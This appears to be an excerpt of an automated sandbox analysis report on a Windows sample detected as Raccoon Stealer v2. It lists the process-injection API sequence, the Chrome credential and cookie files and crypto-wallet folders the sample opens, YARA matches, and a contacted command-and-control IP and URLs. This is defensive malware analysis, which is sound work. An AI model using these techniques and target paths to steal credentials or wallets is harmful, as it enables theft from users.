Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Users\user\AppData\LocalLow\nss3.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\SysWOW64\vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\SysWOW64\msvcp140.dll Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013D8C41 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread, 0_2_013D8C41
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013D2F8F cpuid 0_2_013D2F8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B219D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_013B219D

Stealing of Sensitive Information
barindex
Yara detected Raccoon Stealer v2
Source: Yara match File source: 00000001.00000003.256216440.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.248184995.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.247123478.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.251086981.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.246414861.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.263653396.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.245521959.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.252997013.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality
barindex
Yara detected Raccoon Stealer v2
Source: Yara match File source: 00000001.00000003.256216440.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.248184995.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.247123478.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.251086981.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.246414861.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.263653396.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.245521959.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.252997013.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
89.208.103.4
 unknown Russian Federation
42569 PSKSET-ASRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://89.208.103.4/a9de71948549020b4b91e4dc94a097d9 true
  • Avira URL Cloud: safe
 unknown
http://89.208.103.4/ true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown